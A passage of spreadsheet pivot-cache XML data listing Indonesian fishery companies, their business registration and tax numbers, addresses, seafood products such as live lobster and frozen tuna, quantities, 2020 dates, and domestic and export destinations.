  </r>
  <r>
    <x v="5555"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5556"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5557"/>
    <s v="nib"/>
    <n v="1279000550932"/>
  </r>
  <r>
    <x v="5558"/>
    <s v="nib"/>
    <n v="220000240521"/>
  </r>
  <r>
    <x v="5559"/>
    <s v="nib"/>
    <n v="8120118031722"/>
  </r>
  <r>
    <x v="5560"/>
    <s v="nib"/>
    <n v="1282000602468"/>
  </r>
  <r>
    <x v="5561"/>
    <s v="nib"/>
    <n v="9120006272829"/>
  </r>
  <r>
    <x v="5562"/>
    <s v="nib"/>
    <n v="9120103222223"/>
  </r>
  <r>
    <x v="5563"/>
    <s v="nib"/>
    <n v="9120204731886"/>
  </r>
  <r>
    <x v="5564"/>
    <s v="nib"/>
    <n v="9120200860095"/>
  </r>
  <r>
    <x v="5565"/>
    <s v="nib"/>
    <n v="220008580147"/>
  </r>
  <r>
    <x v="5562"/>
    <s v="npwp"/>
    <s v="01.342.346.2-627.000"/>
  </r>
  <r>
    <x v="5561"/>
    <s v="npwp"/>
    <s v="01.342.405.6-627.000"/>
  </r>
  <r>
    <x v="5566"/>
    <s v="nib"/>
    <n v="9120307182846"/>
  </r>
  <r>
    <x v="5566"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5567"/>
    <s v="nib"/>
    <n v="1272000301474"/>
  </r>
  <r>
    <x v="5368"/>
    <s v="npwp"/>
    <s v="02.268.035.9-723.000"/>
  </r>
  <r>
    <x v="5568"/>
    <s v="nib"/>
    <n v="8120315190255"/>
  </r>
  <r>
    <x v="5569"/>
    <s v="nib"/>
    <n v="259010012546"/>
  </r>
  <r>
    <x v="5570"/>
    <s v="nib"/>
    <n v="234011072513"/>
  </r>
  <r>
    <x v="5571"/>
    <s v="nib"/>
    <n v="8120315190255"/>
  </r>
  <r>
    <x v="5572"/>
    <s v="nib"/>
    <n v="9120201552579"/>
  </r>
  <r>
    <x v="5573"/>
    <s v="nib"/>
    <n v="220304292574"/>
  </r>
  <r>
    <x v="5574"/>
    <s v="nib"/>
    <n v="1243000351567"/>
  </r>
  <r>
    <x v="5245"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5034"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5575"/>
    <s v="nib"/>
    <n v="282000922384"/>
  </r>
  <r>
    <x v="5576"/>
    <s v="nib"/>
    <n v="9120206240679"/>
  </r>
  <r>
    <x v="5577"/>
    <s v="nib"/>
    <n v="9120206240679"/>
  </r>
  <r>
    <x v="5578"/>
    <s v="nib"/>
    <n v="129100700243"/>
  </r>
  <r>
    <x v="5579"/>
    <s v="nib"/>
    <n v="9120001512389"/>
  </r>
  <r>
    <x v="5580"/>
    <s v="nib"/>
    <n v="1232002400977"/>
  </r>
  <r>
    <x v="5581"/>
    <s v="nib"/>
    <n v="220002592278"/>
  </r>
  <r>
    <x v="5582"/>
    <s v="nib"/>
    <n v="9120316080573"/>
  </r>
  <r>
    <x v="5583"/>
    <s v="nib"/>
    <n v="220304292574"/>
  </r>
  <r>
    <x v="5579"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5559"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5580"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5584"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="5584"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5373"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5585"/>
    <s v="nib"/>
    <n v="220200291623"/>
  </r>
  <r>
    <x v="5586"/>
    <s v="nib"/>
    <n v="9120100470789"/>
  </r>
  <r>
    <x v="5587"/>
    <s v="nib"/>
    <n v="2201062902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80">
  <r>
    <n v="20145"/>
    <x v="0"/>
    <s v="CV. LIMA MUTIARA INDOMAL"/>
    <s v="Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Betutu Hidup"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Batam,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Kota Jayapura"/>
    <s v="Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20148"/>
    <x v="0"/>
    <s v="CV. LIMA MUTIARA INDOMAL"/>
    <s v="Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Batam,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Kota Jayapura"/>
    <s v="Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20149"/>
    <x v="0"/>
    <s v="CV. LIMA MUTIARA INDOMAL"/>
    <s v="Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Batam,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Kota Jayapura"/>
    <s v="Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20150"/>
    <x v="0"/>
    <s v="CV. LIMA MUTIARA INDOMAL"/>
    <s v="Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Batam,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Kota Jayapura"/>
    <s v="Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20162"/>
    <x v="0"/>
    <s v="CV. LIMA MUTIARA INDOMAL"/>
    <s v="Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sidat Hidup"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Batam,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Kota Jayapura"/>
    <s v="Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20147"/>
    <x v="0"/>
    <s v="CV. LIMA MUTIARA INDOMAL"/>
    <s v="Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Batam,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Kota Jayapura"/>
    <s v="Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20146"/>
    <x v="0"/>
    <s v="CV. LIMA MUTIARA INDOMAL"/>
    <s v="Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Tanjung Pinang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Semarang, Kabupaten Pemalang, Kabupaten Bantul, Kota Yogyakarta, Kabupaten Malang, Kabupaten Tangerang, Kabupaten Badung, Kabupaten Gianyar, Kabupaten Bangli, Kota Banjarmasin, Kabupaten Berau, Kota Balikpapan, Kota Samarinda, Kota Manado, Kabupaten Luwu, Kota Makassar"/>
    <s v="Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19365"/>
    <x v="1"/>
    <s v="PT. BANYUWANGI CANNERY INDONESIA"/>
    <s v="Jl. Raya Situbondo Km 12,5, Kel. Ketapang, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Albania, Algeria, Angola, Belgium, Bosnia and Herzegovina, Croatia, Egypt, Iraq, Kuwait, Libya, Montenegro, Oman, Papua New Guinea, Qatar, Saudi Arabia, Serbia, Slovenia, Somalia, Syrian Arab Republic, Ukraine, United Arab Emirates, Yemen"/>
  </r>
  <r>
    <n v="21311"/>
    <x v="2"/>
    <s v="PT. ALAM JAYA"/>
    <s v="JL. Rungkut Industri II/25, Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Anggoli, Kerapu, Julung-julung, Jenaha, Kakatua, Kakap Merah, Kaci-kaci, Barramundi)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="674806.98"/>
    <s v="Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya, Kabupaten Sumbawa, Kota Balikpapan, Kota Tarakan, Kota Ambon"/>
    <s v="Canada, China, Dominican Republic, France, Guadeloupe, Malaysia, Martinique, Mauritius, New Zealand, Philippines, Puerto Rico, R√©union, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19840"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kering"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung"/>
    <s v="Brunei Darussalam, China, Hong Kong, India, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20342"/>
    <x v="4"/>
    <s v="CV. DELTON"/>
    <s v="Kp. Jongjing RT 010 RW 003, Kel. Laban, Kec. Tirtayasa, Kabupaten Serang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, Belgium, Chile, China, India, Japan, Korea, Democratic People's Republic of, Netherlands, Philippines, Spain, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19841"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kering"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung"/>
    <s v="Brunei Darussalam, China, Hong Kong, India, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20041"/>
    <x v="5"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Klabat No.40 Perumahan Bukit Baruga, Kel. Antang, Kec. Manggala, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-04-03T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kabupaten Lamongan, Kota Pasuruan, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Tarakan"/>
    <s v="American Samoa, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Maldives, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20042"/>
    <x v="5"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Klabat No.40 Perumahan Bukit Baruga, Kel. Antang, Kec. Manggala, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kulit Ikan Kering"/>
    <d v="2020-04-03T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Medan, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kabupaten Lamongan, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Tarakan"/>
    <s v="American Samoa, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Maldives, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20817"/>
    <x v="6"/>
    <s v="PT. INDONA SAMUDRA PASIFIK INDONESIA"/>
    <s v="Jl. Sanrangan No.14, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Palembang, Kota Batam, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20815"/>
    <x v="6"/>
    <s v="PT. INDONA SAMUDRA PASIFIK INDONESIA"/>
    <s v="Jl. Sanrangan No.14, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Batam, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20813"/>
    <x v="6"/>
    <s v="PT. INDONA SAMUDRA PASIFIK INDONESIA"/>
    <s v="Jl. Sanrangan No.14, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Lencam, Sebelah, Kerapu, Layur, Jenaha, Kaneke, Kakatua, Kakap, Guntur, Barramundi)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="360000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20103"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Julung-julung, Kembung, Lemadang, Marlin, Meka, Opah, Gindara, Layaran, Sarden, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="Australia, Belgium, France, Germany, Greece, Italy, Japan, Mauritius, Netherlands, Philippines, Qatar, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="20816"/>
    <x v="6"/>
    <s v="PT. INDONA SAMUDRA PASIFIK INDONESIA"/>
    <s v="Jl. Sanrangan No.14, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kerang Segar"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="360000"/>
    <s v="Kota Palembang, Kota Batam, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20102"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Belgium, France, Germany, Guadeloupe, Japan, Mauritius, Netherlands, Qatar, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20738"/>
    <x v="8"/>
    <s v="PT. CENHONG FISHERINDO"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jl. Muara Baru Ujung Blok L No.3 Room 4 dan 5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="3646890"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Depok, Kabupaten Tangerang"/>
    <s v="Colombia, Japan, Korea, Democratic People's Republic of, Malawi, Singapore, South Africa, Sri Lanka, Suriname, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="18354"/>
    <x v="9"/>
    <s v="PT, REPUBLIK LAUTAN JAYA"/>
    <s v="Muara Angke PHPT Pengasinan Blok A No,6 RT 001 RW 006, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering "/>
    <d v="2020-07-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Indramayu, Kabupaten Cilacap, Kabupaten Tegal, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="18355"/>
    <x v="9"/>
    <s v="PT, REPUBLIK LAUTAN JAYA"/>
    <s v="Muara Angke PHPT Pengasinan Blok A No,6 RT 001 RW 006, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-07-13T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara, Kota Bandung, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21106"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Amberjack, Lemuru, Tongkol, Kuwe, Kembung, Tenggiri, Selar Kuning)"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21108"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Segar"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21110"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Segar"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21111"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Pari Segar"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21112"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rajungan Segar"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21113"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Segar"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21114"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Mata Besar, Sebelah, Flounder, Manyung, Kerapu, Layur, Bawal, Kakap, Barramundi)"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="17022"/>
    <x v="11"/>
    <s v="CV. SUMBER ASIA TRADING COMPANY"/>
    <s v="Jl. Raya Tratas No.19, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demesal Beku (Swanggi, Sebelah, Manyung, Kerapu, Gerot-gerot, Layur, Bawal, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="4680000"/>
    <m/>
    <s v="Bahrain, Central African Republic, Egypt, Hong Kong, Iran, Islamic Republic of, Israel, Kuwait, Lebanon, Philippines, Saudi Arabia, Thailand"/>
  </r>
  <r>
    <n v="20213"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="73000"/>
    <s v="Kota Palembang, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20214"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Segar"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Palembang, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20210"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Tenggiri, Tuna)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20211"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Kerapu, Bawal, Kakap, Tenggiri)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20212"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
